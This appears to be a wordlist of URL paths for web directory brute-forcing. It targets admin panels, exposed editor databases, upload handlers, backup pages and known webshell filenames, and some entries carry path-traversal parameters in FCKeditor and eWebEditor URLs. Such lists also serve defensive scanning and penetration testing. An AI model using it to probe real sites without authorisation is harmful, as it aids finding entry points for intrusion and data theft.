/Databases/0791idc.mdb
/db/ewebeditor.mdb
/dbase.asp
/debug
/Default
/Default_Default.asp?
/Default_index.asp
/denglu
/denglu/admin.asp
/dhtml
/dir
/directadmin
/dir-login
/dirs
/dl
/doc
/docs
/door
/double
/down
/down/login
/down/login.asp
/download
/downloads
/downloadz
/driver
/drivers
/dvbbs/down_addsoft.asp
/dvbbs/post_upfile.asp
/dvbbs/post_upload.asp
/dvbbs/reg_upload.asp
/dvbbs/saveup.asp
/dvbbs/upfile.asp
/dvbbs/upload_soft.asp
/dxxobbs/upload.asp
/e
/EAdmin
/eadmin/login.asp
/Edit
/edit/admin_login.asp
/edit/db/ewebeditor.mdb
/Editor
/editor/admin_login.asp?
/editor/db/ewebeditor.mdb
/editor/filemanager/browser/default/browser.html
/editor/upload.asp 
/email
/emails
/en_US
/entry
/esuper
/esuperadmin
/event
/eWeb/admin_login.asp
/eWeb/db/ewebeditor.mdb
/ewebedit/db/ewebeditor.mdb
/ewebedit/ewebeditor.asp
/eWebEditor
/eWebEditor/Admin
/eWebEditor_v280_Free/admin_login.asp
/eWebEditor_v280_Free/db/ewebeditor.mdb
/ezsqliteadmin
/f
/FCKeditor
/FCKeditor/editor/
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/php/connector.asp
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
/file
/fileadmin
/fileadmin.asp
/fileadmin.html
/files
/filez
/final
/food
/format.asp
/formslogin
/Forum
/forum/upfile.asp
/fpv_admin/admin.asp
/free
/freepic
/freepics
/front
/ftp
/Fuck
/fucks
/g
/g_admin.asp
/gal
/galleries
/gallery
/galls
/game
/games
/gamez
/Gb
/gb/register.asp
/gbook/login.asp
/girl
/girls
/girlz
/gl
/gl.asp
/gl.jsp
/gl/adminlogin.asp
/gladmin.asp
/gladmin.aspx
/gladmin.jsp
/gladmin/login.asp
/gllogin.asp
/gllogin.aspx
/gllogin.jsp
/globes_admin
/gly
/graph
/graphic
/graphics
/graphs
/guan
/guan/guanli.asp
/guanli
/guanli/admin.asp
/guanli/denglu/
/guanli/index.asp
/guanli/login.asp
/guanliadmin.asp
/guanliadmin.jsp
/guanlilog.asp
/guanlilog.jsp
/guanlilogin.asp
/guanlilogin.jsp
/guanliyuan
/guanliyuan.asp
/guanliyuan.jsp
/guest/login.asp
/GuestBook
/guestbook/login.asp
/guestbook/man.asp
/h
/hardcore
/Hello
/help
/hidden
/hide
/home
/houtai
/houtai/admin.asp
/houtai/Admin_Login.asp
/houtaidenglu
/houtaiguanli
/hpwebjetadmin
/Hradmin/admin.asp
/ht
/htdl
/htdoc
/htdocs
/htgl
/htmedit/admin_login.asp
/htmedit/db/ewebeditor.mdb
/html
/i
/id
/id_pass.asp
/ids
/image
/Images
/images_dir
/imagez
/img/
/inadmin.asp
/Inc
/inc/config.asp
/include
/includes
/index
/index.asp
/index_admin
/index_Default.asp?
/index_manage
/indexadmin
/indexDefault.asp?
/Indy_admin
/InFile
/info
/info.asp
/inforadmin.asp
/infos_admin/
/InSide
/InTranet
/irc-macadmin
/j
/k
/Kes/Admin/Admin_Login.asp
/kycj/kycj/login.asp
/l
/land/land.asp
/lavery_Edit/Admin_Login.asp
/les
/lesb
/lesbian
/lesbians
/lesbo
/lez
/Library/DbConnect.asp
/link
/link/admin_login.asp
/links
/linkz
/list
/liuyan/login.asp
/LiveUser_Admin
/Local
/Log
/Log.htm
/logi.asp
/login
/login.asa
/login.aspx
/login.jsp
/Login/Admin
/login/admin.asp
/login/admin/admin.asp
/login/Default.asp?
/login/index
/login/index.asp
/login/login
/login/login.asp
/login/logout.asp
/login/super
/login/super.asp
/login_db
/login_Default.asp?
/Login_From
/login1
/loginDefault.asp?
/loginflat
/loginini.asp
/login-redirect
/loginsys.asp
/login-us
/logn/
/logo_sysadmin
/Logon
/logsys.asp
/lost
/Lotus_Domino_Admin
/lyb/admin_login.asp
/lyb/login.asp
/m
/macadmin
/mail
/mails
/Main
/main/login
/main/login.asp
/main1.as
/MainLogin
/MainTain
/maintenance
/manage
/manage/admin.asp
/manage/admin_index.asp
/manage/admin_login.asp
/manage/AdminLogin.asp
/manage/Edit/admin_login.asp
/manage/Edit/db/ewebeditor.mdb
/manage/Editor/admin_login.asp
/manage/Editor/db/ewebeditor.mdb
/manage/eweb/admin_login.asp
/manage/eWeb/db/ewebeditor.mdb
/manage/eWebEditor/admin_login.asp
/manage/eWebEditor/db/ewebeditor.mdb
/manage/eWebEditor_v280_Free/admin_login.asp
/manage/eWebEditor_v280_Free/db/ewebeditor.mdb
/manage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
/manage/FCKeditor/editor/filemanager/upload/test.html
/manage/htmedit/admin_login.asp
/manage/htmedit/db/ewebeditor.mdb
/manage/index.asp
/manage/login.asp
/manage/login/Login.asp
/manage/WebEdit/admin_login.asp
/manage/WebEdit/db/ewebeditor.mdb
/manage/WebEditor/admin_login.asp
/manage/WebEditor/db/ewebeditor.mdb
/manage_index
/management
/management/login.asp
/manager
/manager.asp
/manager/admin.asp
/manager/admin/admin_login.asp
/manager/admin_index.asp
/manager/admin_login.asp
/manager/index.asp
/manager/left.asp
/manager/login
/manager/login.asp
/manager/manager.asp
/manager/ndex.asp
/Manager_Login
/Managers
/manages.asp
/manga
/mangas
/manual
/manuallogin
/Master
/master/memmng/login.asp
/mem/login.asp
/member
/member/admin.asp
/member/login.asp
/MemberLogin
/members
/memlogin
/messy
/meta_login
/mg/Login.asp
/Mgr
/mirror
/mirrors
/misc
/Mmgr
/mod
/modelsearch/login.asp
/moderator
/moderator.asp
/moderator.html
/moderator/admin.asp
/moderator/admin.html
/moderator/login.asp
/moderator/login.html
/mods
/module
/mon
/monitor
/monitors
/movies
/myadmin
/Mybbs
/mybbssaveup.asp
/n
/navSiteAdmin
/new
/new/admin_index.asp
/new/Admin_New/default.asp
/NewAdmin
/Newbbs
/newbbs/login
/newbbs/login.asp
/newhome
/News
/news/admin/default.asp
/news/admin/upfile.asp
/news/admin_login.asp
/news/login.asp
/news/manage/login.asp
/news/newadmin/
/news/newadmin/test.asp
/News_Admin
/newsadmin
/newslogin.htm.
/NewWeb
/newz
/o
/Office
/office.asp
/office.aspx
/office.jsp
/office/login.asp
/oh
/Ok
/old
/Oldbbs
/older
/oldies
/Oldweb
/openvpnadmin
/Other
/p
/panel
/pass
/password
/password_search.asp
/passwords
/passwordz
/pers
/perso
/personnal
/pgadmin
/photo
/photos
/php_Admin
/phpldapadmin
/phpmyadmin
/phppgadmin
/phpSQLiteAdmin
/pic
/picpost
/picposts
/pics
/picture
/pictures
/picturez
/picz
/platz_login
/post
/power
/power_user
/preview
/PreviewImage/
/previews
/previewz
/priv
/private
/product
/Product/Manage
/Product/manage/login.asp
/products
/profile/login.asp
/prog
/program
/programs
/project/webpet/login.asp
/project-admins
/protect
/protected
/prv
/pub
/public
/puppy
/pureadmin
/pwd
/pwds
/q
/r
/radmind
/radmind-1
/rcLogin
/Reg
/Register
/report
/reports
/review
/reviews
/Root
/root/login.asp
/rootceo.asp
/run
/s
/SAdmin
/script
/scripts
/secret
/secrets
/secure
/security
/serial
/serials
/serialz
/Server
/Server.asp
/Server.html
/server_admin_small
/server_stats
/ServerAdministrator
/service
/services
/set
/setup
/sex
/sexy
/shemales
/Shop/Admin
/Show/Back
/show/back/index.asp
/showlogin
/shtml
/simpleLogin
/Site
/Skins/
/SManager
/smblogin
/soft_admin.asp
/soft_admin.aspx
/soft_admin.jsp
/solution
/solutions
/source
/Sql
/sql-admin
/SqlConf
/ss_vms_admin_sm
/sshadmin
/staradmin
/stat
/statistics
/stats
/stock/login.asp
/Store
/Stores
/Ststems
/ststems/
/stuff
/sub-login
/super
/Super-Admin
/supervise
/supervise/Login.asp
/supervisor
/SupplierAdm
/support
/support_login
/sxadmin/index.asp
/Sys
/sys/
/sys/admin/login.asp
/sys/login.asp
/sys/login/
/Sys_Login
/sys_manage/sys_index.asp
/SysAdmin
/sys-admin
/sysadmin.asp
/sysadmin.html
/SysAdmin/login.asp
/SysAdmin2
/sysadmins
/sysadmins.asp
/syslog.asp
/syslogi.asp
/SysLogin
/syslogin.asp
/SysManager
/System
/system/default.asp
/system/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
/system/FCKeditor/editor/filemanager/upload/test.html
/system/index.asp
/System/Login
/system/login.asp
/system/manage.asp
/system/manage/index.asp
/system_administration
/system-administration
/systemceo.asp
/systemroot.asp
/Systems
/Systems/Login
/systems/login.asp
/systems/login/
/szwyadmin/login.asp
/t
/tab
/tacforo/admin_login.asp
/teen
/Teens
/teenz
/telephone
/temp
/Test
/thumb
/thumbs
/thumbz
/tmp
/today
/top
/toucher/admin_login.asp
/Trade
/Trade/Admin
/trade/admin/Login.asp
/tryread/forbook1.asp   
/typo3
/u
/union/admin.asp
/up
/update
/UpdDate
/upl
/Upload
/upload_soft.asp
/UploadFace/
/UploadFile/
/uploads
/UploadSoft/diy.asp
/uploadz
/ur-admin
/ur-admin.asp
/ur-admin.html
/us
/user
/user/admin.asp
/user/index.asp
/user/login.asp
/user/logout.asp
/user/super.asp
/User_Admin
/user_Default.asp?
/User_Login
/useradmin
/userDefault.asp?
/UserLogin
/usermanage/
/users
/usr
/usrs
/utility_login
/v
/vadmind
/valid
/validate
/validated
/vip_manage/login.asp
/vipuser.asp
/vipuser_login.asp
/vmailadmin
/w
/warez
/web
/Web_Master
/Web1
/Web2
/webadmin
/webadmin.html
/WebApps
/webDefault.asp?
/webedit/admin_login.asp
/WebEdit/db/ewebeditor.mdb
/webedit1/admin_login.asp
/webedit1/db/ewebeditor.mdb
/WebEditor/admin_login.asp
/WebEditor/db/ewebeditor.mdb
/webhome
/webmaster
/websvn
/WeiHu
/weihu/login.asp
/wenzhang
/wizmysqladmin
/work
/working
/wp-admin
/wp-login
/WsManage
/wstats
/www
/x
/xlogin
/XtAdmin
/y
/yonetici.asp
/yonetici.html
/yonetim.asp
/yonetim.html
/z
/zip
/zips
/zkcf/login.asp
/登陆.asp
/管理员.asp
/假地址
/假地址.asp
/admin_move/
/basedadmin/
/basedadmin.asp
/g_admin/
/Indy_admin/
/AdminPage
/admin/admin.php
/admin.php
/upfile_photo.asp 
/upfile_softpic.asp 
/upfile_adpic.asp
/upfile.asp 
/upload.asp 
/Upfile_Article.asp 
/Upfile_AdPic.asp 
/Upfile_OrderPic.asp
/Upfile_AdPia.asp 
/Upfile_Articla.asp
/databass/datashop.asp
/Upfile_Soft.asp 
/index.aspx
/changepwd.aspx
/admin_index.aspx
/star.aspx
/book.aspx
/moban.aspx
/default.aspx
/2006.aspx
/add.aspx
/aspadmin.aspx
/admin_admin.aspx
/Link/upload/upload.aspx
/upload/upload.aspx
/fileup.aspx
/LookupPass.aspx
/shipin.aspx
/mylink.aspx
/index0.aspx
/Admin_Login588.aspx
/dbconn_logo.aspx
/Admin_Login888.aspx
/Admin_Login8.aspx
/Upfilem.aspx
/Upfilep.aspx
/upfilexinxi.aspx
/wjleft.aspx
/ppbd.aspx
/admintghdhgfb.aspx
/Uploaddd.aspx
/cxhd.aspx
/baoming.aspx
/admincxfb.aspx
/Char.aspx
/ggfb.aspx
/yx_Update.aspx
/Admin_Field.aspx
/qyjxy.aspx
/Admin_Database.aspx
/gsjj.aspx
/wzgg.aspx
/tjly.aspx
/Admin_Help_User.aspx
/Admin_Label.aspx
/Admin_Maillist.aspx
/xwzx.aspx
/zllm.aspx
/zxly.aspx
/admin_htmlqx.aspx
/Admin_UploadFile_Style.aspx
/test_upload.aspx
/Admin_Message.aspx
/enterprise/upfile.aspx
/UserList.aspx
/Admin_Photo.aspx
/admin_config.aspx
/darkst.aspx
/admin_config.aspx.bak
/admin_data.aspx
/admin_data.aspx.bak
/admin_default.aspx
/admin_edit.aspx
/admin_login.aspx
/admin_master.aspx
/admin_member.aspx
/admin_setup.aspx
/admin_upfile.aspx
/admin_uploadfile.aspx
/admin_uploadfile_user.aspx
/admin_user.aspx
/article.aspx
//szwyadmin/login.aspx
/articleinfo.aspx
/edi/admin/login.aspx
/blog.aspx
/build.aspx
/ewebsoft/admin_login.aspx
/ASPXspy2.aspxx
/admin_manage_access/login.aspx
/admin_manage/login.aspx
/Upfiledd.aspx
/aspxspy.aspxx
/changepass.aspx
/Upload_Photo.aspx
/cmd.aspx
/code.aspx
/admin/web_login.aspx
/web_login.aspx
/code.aspx.bak
/Stats.aspx
/config.aspx
/config.aspx.bak
/conn.aspx
/guli/login.aspx
/conn.aspx.bak
/connection.aspx
/connection.aspx.bak
/count.aspx
/create.aspx
/daemon.aspx
/kwadmin/A_Login.aspx
/default.aspx.bak
/default_1.aspx
/default_1.aspx.bak
/default1.aspx
/ewebeditor/asp/browse.aspx
/default1.aspx.bak
/default2.aspx
/default2.aspx.bak
/diy.aspx
/down_addsoft.aspx
/down_picupfile.aspx
/down_picupload.aspx
/edit.aspx
/email.aspx
/err.aspx
/error.aspx
/ewebeditor.aspx
/funciton.aspx.bak
/A_Login.aspx
/function.aspx
/getpass.aspx
/go.aspx
/head.aspx
/img_upfile.aspx
/inc.aspx
/inc.aspx.bak
/index.aspx.bak
/index1.aspx
/incFiles/load_gg.aspx
/upload_flash_.aspx
/qyml/upproduce.aspx
/upproduce.aspx
/index1.aspx.bak
/install.aspx
/js.aspx
/left.aspx
/list.aspx
/logon.aspx
/logout.aspx
/usergroup_0.aspx
/forumdata/cache/usergroup_0.aspx
/main.aspx
/manage.aspx
/md5.aspx
/member_list.aspx
/more.aspx
/news.aspx
/news_list.aspx
/organise.aspx
/open.aspx
/open.aspx.bak
/pass.aspx
/passwd.aspx
/password.aspx
/photo.aspx
/popup.aspx
/readme.aspx
/reg.aspx
/register.aspx
/reload.aspx
/rss.aspx
/rss1.aspx
/rss2.aspx
/rssfree.aspx
/Saveannounce_upload.aspx
/savecomment.aspx
/savemessage.aspx
/saveup.aspx
/search.aspx
/setup.aspx
/setup.aspx.bak
/shell.aspx
/show.aspx
/shownews.aspx
/syscode.aspx
/syscode.aspx.bak
/sytle.aspx
/tb.aspx
/test.aspx
/test.aspx.bak
/upfile_flash.aspx
/upfile_soft.aspx
/Upfile_SoftPic.aspx
/UploadFace.aspx
/uploadfaceok.aspx
/user.aspx
/user_files.aspx
/user_friends.aspx
/user_help.aspx
/user_index.aspx
/user_login.aspx
/user_message.aspx
/user_messages.aspx
/user_setting.aspx
/user_subject.aspx
/user_top.aspx
/user_update.aspx
/user_upfile.aspx
/ver.aspx
/vote.aspx
/warning.aspx
/webshell.aspx
/administrator.aspx
/boss/admin.aspx
/m_login.aspx
/adminlogin.aspx
/Zzm.aspx 
/My-login.aspx
/1ndex.aspx
/ManageLogin.aspx
/HX_LOGIN.aspx
/editor/admin_login.aspx
/eWebEditor/admin_login.aspx
/admin/eWebEditor/admin_login.aspx
/admin/editor/admin_login.aspx
/dl.aspx
/Admin_DataBackup.aspx
/Data_Backup.aspx
/admin_backup.aspx
/admin_db_backup.aspx?action=BackupData
/Manage_backup.aspx?action=Backup
/admin_data.aspx?action=BackupData
/Manage_backup.aspx
/Data_Return.aspx
/admin_db_backup.aspx?action=RestoreData
/admin_data.aspx?action=RestoreData
/gldl.aspx
/logo.aspx
/admin_style.aspx
/sqlin.aspx
/inc/upload_flash.aspx
/upload_flash.aspx
/db.aspx
/dbb.aspx
/NewsUpLoad.aspx
/inc_config.aspx
/b2b_sysdata.aspx
/webconfig.aspx
/Fy_SqlX.aspx
/lostpass.aspx
/Neeao_SqlIn.aspx
/Neeao_sql_admin.aspx
/bottom.aspx
/foot.aspx
/end.aspx
/top.aspx
/setting.aspx
/admin_webmaster.aspx
/GetPassword.aspx
/findpassword.aspx
/User_GetPassword.aspx
/change_password.aspx
/update.aspx
/adduser.aspx
/xiaoma.aspx
/dama.aspx
/gbook.aspx
/webadmin.aspx
/admin_login_lg.aspx
/admin_sql.aspx
/admin_backupdata.aspx
/admin_Restoredata.aspx
/admin_EditPass.aspx
/admin_server.aspx
/default_right.aspx
/Gas_login.aspx
/ScanShell.aspx
/%23sql.aspx
/sql.aspx
/admin_db_backup.aspx
/admin_set.aspx
/admin_setting.aspx
/admincheck.aspx
/adminfso.aspx
/data.aspx
/SysUser.aspx
/check.aspx
/link.aspx
/links.aspx
/Sys_admin.aspx
/a_main.aspx
/adminda.aspx
/login1.aspx
/ad.aspx
/ad_login.aspx
/ad_manage.aspx
/addlb.aspx
/addmember.aspx
/adm_login.aspx
/Admin_BatchLink.aspx
/admin_del.aspx
/admin_delete.aspx
/admin_main.aspx
/Admin_SoftInfo.aspx
/admin1.aspx
/admin888.aspx
/adminadduser.aspx
/admindel.aspx
/admindelete.aspx
/adminedit.aspx
/adminmember.aspx
/adminuserlogin.aspx
/admintab.aspx
/adminuser.aspx
/chkadmin.aspx
/chklogin.aspx
/denglu.aspx
/edituser.aspx
/editmember.aspx
/index_admin.aspx
/index_manage.aspx
/guanli.aspx
/guanli-cn.aspx
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspx
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.aspx
/connector.aspx
/houtai.aspx
/houtaiguanli.aspx
/htgl.aspx
/login_admin.aspx
/login_out.aspx
/manage_index.aspx
/member.aspx
/members.aspx
/adm_menu.aspx
/bm/chkadmin.aspx
/Select_feedback.aspx
/admin_6list.aspx
/users.aspx
/sys.aspx
/adm.aspx
/system.aspx
/systems.aspx
/aspcheck.aspx
/hacker.aspx
/123.aspx
/3800cc.aspx
/hack.aspx
/sys_login_easysite.aspx
/adlogin.aspx
/login_message.aspx
/adminindex.aspx
/UserLogin.aspx
/login_manage.aspx
/gg_login.aspx
/sysadm_login.aspx
/manage_login.aspx
/xh_login.aspx
/admincs.aspx
/land.aspx
/elogin.aspx
/loginManage.aspx
/yns_login.aspx
/vo_login.aspx
/lygofa.aspx
/wen_login.aspx
/jswadmin.aspx
/admlogin.aspx
/ImageGallery.aspxx?rif=/&cif=../&ftb=reProduct_content2
/default_Image.aspx
/forbook1.aspx
/upfile_Dialog.aspx
/upimg.aspx
/upload.aspx?action=upfile
/upload_add.aspx
/upload_browse.aspx
/upload_new_ad.aspx
/1.aspx
/11.aspx
/111.aspx
/1234.aspx
/12345.aspx
/123456.aspx
/ewebeditor.aspx?id=x&style=standard
/22.aspx
/222.aspx
/3.aspx
/33.aspx
/333.aspx
/ASPAdmin_A.aspx
/DbConnect.aspx
/Login_ok.aspx
/USERok.aspx
/_admin.aspx
/a.aspx
/aa.aspx
/aaa.aspx
/ad_admin_login.aspx
/add_admin.aspx
/add_user.aspx
/admcheck.aspx
/admcheckform.aspx
/admin123.aspx
/admin2.aspx
/admin_bak.aspx
/admin_count.aspx
/admin_forums.aspx
/admin_home.aspx
/admin_info.aspx
/admin_pass.aspx
/admin_test.aspx
/adminadmin.aspx
/administration.aspx
/admins.aspx
/admout.aspx
/admsystem.aspx
/adoconn.aspx
/asdf.aspx
/aspcmd.aspx
/auto.aspx
/back.aspx
/backadm.aspx
/backup.aspx
/base64.aspx
/bbs.aspx
/bbs1.aspx
/c99.aspx
/cao.aspx
/caonima.aspx
/cfg.aspx
/cipher.aspx
/cmdasp.aspx
/command.aspx
/common.aspx
/conf.aspx
/connstr.aspx
/console.aspx
/const.aspx
/consts.aspx
/count_admin.aspx
/cp.aspx
/crypto.aspx
/cshell.aspx
/css.aspx
/d99.aspx
/db_con.aspx
/dbconn.aspx
/decrypt.aspx
/default_admin.aspx
/default_login.aspx
/del.aspx
/del_admin.aspx
/del_member.aspx
/delete.aspx
/deletemember.aspx
/devel.aspx
/System/Function/UploadProductPic.aspx
/Function/UploadProductPic.aspx
/UploadProductPic.aspx
/digshell0.aspx
/digshell2.aspx
/diy3.aspx
/dm.aspx
/do.aspx
/down.aspx
/dtest.aspx
/emyuser_login.aspx
/encrypt.aspx
/exit.aspx
/file.aspx
/files.aspx
/findaccount.aspx
/forum.aspx
/frame.aspx
/freeweb_admin.aspx
/fuck.aspx
/fuckyou.aspx
/girl.aspx
/girls.aspx
/global.aspx
/guanli-tw.aspx
/hate.aspx
/hello.aspx
/ht.aspx
/htdocs.aspx
/idea.aspx
/ideas.aspx
/inFile.aspx
/include.aspx
/includeinc.aspx
/includes.aspx
/incoming.aspx
/index_test.aspx
/indexadmin.aspx
/insert.aspx
/inside.aspx
/intranet.aspx
/key.aspx
/kill.aspx
/link_admin.aspx
/local.aspx
/log.aspx
/logger.aspx
/login_check.aspx
/login_from.aspx
/login_in.aspx
/loginerror.aspx
/loginform.aspx
/loginok.aspx
/loginsave.aspx
/loginsuper.aspx
/love.aspx
/luck.aspx
/m.aspx
/ma.aspx
/main1.aspx
/mainframe.aspx
/maintain.aspx
/man.aspx
/manager_login.aspx
/managers.aspx
/manual.aspx
/master.aspx
/member_download.aspx
/memberlogin.aspx
/menu.aspx
/mgr.aspx
/misc.aspx
/mm.aspx
/mmgr.aspx
/mmm.aspx
/mrtg.aspx
/muma.aspx
/my.aspx
/myadmin.aspx
/myup.aspx
/new.aspx
/upfile.aspx
/upload.aspx
/newadmin.aspx
/news_admin.aspx
/newsadmin.aspx
/ok.aspx
/ok_pass.aspx
/other.aspx
/phpcmd.aspx
/phpinfo.aspx
/phpspy.aspx
/post_upfile.aspx
/post_upload.aspx
/private.aspx
/program.aspx
/programming.aspx
/programs.aspx
/public.aspx
/reg_upload.aspx
/reg_upload1.aspx
/reg_user.aspx
/root.aspx
/sadmin.aspx
/savelogin.aspx
/secret.aspx
/secrets.aspx
/server-info.aspx
/server-status.aspx
/server_stats.aspx
/servu.aspx
/set.aspx
/sever.aspx
/site.aspx
/smanager.aspx
/snmp.aspx
/source.aspx
/sources.aspx
/spy.aspx
/sqlconf.aspx
/stat.aspx
/statistics.aspx
/store.aspx
/ststems.aspx
/su.aspx
/super.aspx
/super1.aspx
/supplieradm.aspx
/sys_login.aspx
/sys_memu.aspx
/sysadm_index.aspx
/telephone.aspx
/temp.aspx
/temp_admin.aspx
/temporary.aspx
/test1.aspx
/test_download.aspx
/test_page.aspx
/tester.aspx
/tester_download.aspx
/tool.aspx
/tools.aspx
/up.aspx
/update_user.aspx
/usage.aspx
/user_admin.aspx
/userlook.aspx
/userslist.aspx
/wantpws.aspx
/weblog.aspx
/weblogs.aspx
/webmaster.aspx
/webstats.aspx
/include/upfile_asp.aspx
/include/upfile.aspx
/wenzhang.aspx
/include/upload_asp.aspx
/include/upload.aspx
/wish.aspx
/woaini.aspx
/wocaonima.aspx
/work.aspx
/write.aspx
/ws.aspx
/wstats.aspx
/www.aspx
/wwwlog.aspx
/x.aspx
/xiao.aspx
/xiaolu.aspx
/xm.aspx
/xx.aspx
/xxx.aspx
/yes.aspx
/z.aspx
/zz.aspx
/zzz.aspx
/newsupfile.aspx
/Up_BookPicPro.aspx
/upLoad_bm1.aspx
/upLoad_c1.aspx
/uploadPic.aspx
/upNewsIMg.aspx
/picupsave2.aspx
/hege.aspx
/mywebshell.aspx
/fileupimg2.aspx
/upfile_photo.aspx
/userreg_setp2.aspx
/lovebaobao.aspx
/mymm.aspx
/newmm.aspx
/saveupload.aspx
/manage/upfile.aspx
/zs_save_add.aspx
/UploadImage3_upload.aspx
/upfile1.aspx
/upfilea.aspx
/upme2.aspx
/addFile.aspx
/addPicture.aspx
/upme1.aspx
/uploadfilm.aspx
/upfile_Other.aspx
/upsave.aspx
/uploadphoto.aspx
/web_upfile.aspx
/upfile2.aspx
/photosave.aspx
/sub_upload.aspx
/s_image.aspx
/newsimage1.aspx
/picupsave.aspx
/picupload.aspx
/upload2.aspx
/uploada.aspx
/upload1.aspx
/upfile_article.aspx
/uploadfiles.aspx
/uploadfiles1.aspx
/showimg.aspx
/Upfile_ProductPic.aspx
/Upload_ProductPic.aspx
/upfiles.aspx
/upfile3.aspx
/upload3.aspx
/admin_uploadF.aspx
/admin_upload.aspx
/Upfile_pic.aspx
/Upfile_pics.aspx
/Upfile_Product.aspx
/articleadmin.aspx
/loginadmin.aspx
/eye2007Admin_login.aspx
/infom_login.aspx
/KesAdmin_Login.aspx
/localhostlogin.aspx
/cz_login.aspx
/Articlelogin.aspx
/xxmslogin.aspx
/downlogin.aspx
/bbsLogin.aspx
/ewebeditor1013.aspx
/shopb2b_sysdata.aspx
/asplogin.aspx
/tradeLogin.aspx
/6k.aspx
/zm_marry.aspx
/fdnews.aspx
/play.aspx
/mdb.aspx
/joekoe_data.aspx
/news3000.aspx
/configuration/system/Upload_user.aspx
/12912.aspx
/database.aspx
/starark.aspx 
/download.aspx
/tiyisw.aspx
/datashop.aspx
/liaoxd.aspx
/Fl_Web.aspx
/Hz@host!.aspx 
/lennyash.aspx
/roha.aspx
/Skyj.aspx
/wrtxcnqywz4.aspx
/wygkcnqyhtml.aspx
/PBlog2.aspx
/PBlog1.aspx
/PBlog3.aspx
/oask.aspx
/heiren.aspx
/115cn.aspx
/dvboke.aspx
/asp99cms.aspx
/../admin.aspx
/../admin/default.aspx
/../admin/index.aspx
/../admin/login.aspx
/../admin/manage.aspx
//admin/login.aspx
/11111/index.aspx
/88888/index.aspx
/a_admin.aspxx
/account.aspx
/acct/login.aspx
/ad_admin/admin_login.aspx
/admin.aspxx
/admin/account.aspx
/admin/adm_menu.aspx
/admin/admin.aspxx
/admin/admin_6list.aspx
/Admin/Admin_Index.aspx
/admin/admin_login.aspx
/admin/admin_upfile.aspx
/admin/adminlogin.aspx
/admin/aspcheck.aspx
/admin/controlpanel.aspx
/admin/cp.aspx
/admin/default.aspx
/admin/Default.aspx?
/admin/default/admin.aspx
/admin/default/login.aspx
/admin/edit/admin_login.aspx
/admin/editor/admin_login.aspx?
/admin/eWebEditor_v280_Free/admin_login.aspx
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
/admin/go.aspx
/admin/home.aspx
/admin/htmedit/admin_login.aspx
/admin/index.aspx
/admin/left.aspx
/admin/login.aspx
/admin/lygofa.aspx
/admin/manage.aspx
/admin/manage/admin.aspx
/admin/manage/login.aspx
/admin/menu.aspx
/admin/news.aspx
/admin/ows_login.aspx
/admin/Select_feedback.aspx
/admin/test.aspx/info.aspx
/admin/upfile.aspx
/admin/upload.aspx
/admin/uploadfaceok.aspx
/admin/user_login.aspx
/admin/WebEditor/admin_login.aspx
/admin/xh_login.aspx
/admin/yns_login.aspx
/admin_.aspx
/admin_body.aspx
/admin_Default.aspx?
/admin_index/admin_index.aspx
/admin_index/login.aspx
/WebEditor/admin_uploadfile.aspx?id=14&dir=../../..
/Admin_jsCreate.aspx
/admin/admin_uploadfile.aspx
/admin_login/admin.aspx
/admin_login/login.aspx
/admin_manage_access/Admin_Default.aspx
/admin_move/Admin_Login.aspx
/admin_soft.aspxx
/Admin_SoftCateMenu.aspx
/Admin_SoftLink.aspx
/Admin_SoftList.aspx
/Admin_SubCate.aspx
/Admin_UpdateSoftNum.aspx
/Admin_UserSetting.aspx
/admin_yuzhiguo/login.aspx
/Admin_ZgTea_Art/Login.aspx
/admin1/Admin_Login.aspx
/adminceo.aspx
/admincn2008/login.aspx
/admincontrol.aspx
/adminDefault.aspx?
/AdminFile/Admin_Login.aspx
/adminin.aspx
/administr8.aspx
/administrator/account.aspx
/administrator/admin.aspx
/administrator/index.aspx
/administrator/login.aspx
/adminkey.aspx
/adminlog.aspx
/admin-login/login.aspx
/adminpanel.aspx
/adminroot.aspx
/admins_login.aspx
/adminsys.aspx
/adsystem/index.aspx
/amd/index.aspx
/amd/login.aspx
/amd/super.aspx
/amd_/admin.aspx
/amd_/index.aspx
/amd_/login.aspx
/amd_/super.aspx
/art.aspx
/article/admin/admin.aspx
/asjobcom/index.aspx
/asp.aspx
/asp/admin/login.aspx
/b_admin.aspx
/back/login.aspx
/basedadmin/admin_login.aspx
/bbs/admin_index.aspx
/bbs/admin_login.aspx
/bbs/diy.aspx
/bbs/down_addsoft.aspx
/bbs/down_picupfile.aspx
/bbs/elogin.aspx
/bbs/login.aspx
/bbs/post_upfile.aspx
/bbs/post_upload.aspx
/bbs/reg_upload.aspx
/bbs/saveup.aspx
/bbs/upfile.aspx
/bbs/upload_soft.aspx
/bestcollegepicks/login.aspx
/book/login.aspx
/book1/login.aspx
/boss/admin_login.aspx
/boss/login.aspx
/boss/WebEditor/admin_login.aspx
/careerfocus/Login.aspx
/ccms/index.aspx
/ccms/login.aspx
/CEO.aspx
/ceoadmin.aspx
/cgi-bin/login.aspx
/cgi-bin/System/Userlogin.aspx
/cjcx/login.aspx
/CmsEditor/Upload.aspx 
/college/index.aspx
/controlpanel.aspx
/count/supervise/Login.aspx
/Create_Commend.aspx
/Create_Default.aspx
/Create_jsNews.aspx
/Create_jsSearch.aspx
/Create_New.aspx
/Create_Other.aspx
/Create_SoftCate.aspx
/Create_SoftList_All.aspx
/Create_SoftList_Cate.aspx
/databases.aspx
/dbase.aspx
/Default_Default.aspx?
/Default_index.aspx
/denglu/admin.aspx
/down/login.aspx
/dvbbs/down_addsoft.aspx
/dvbbs/post_upfile.aspx
/dvbbs/post_upload.aspx
/dvbbs/reg_upload.aspx
/dvbbs/saveup.aspx
/dvbbs/upfile.aspx
/dvbbs/upload_soft.aspx
/dxxobbs/upload.aspx
/eadmin/login.aspx
/edit/admin_login.aspx
/editor/admin_login.aspx?
/editor/upload.aspx 
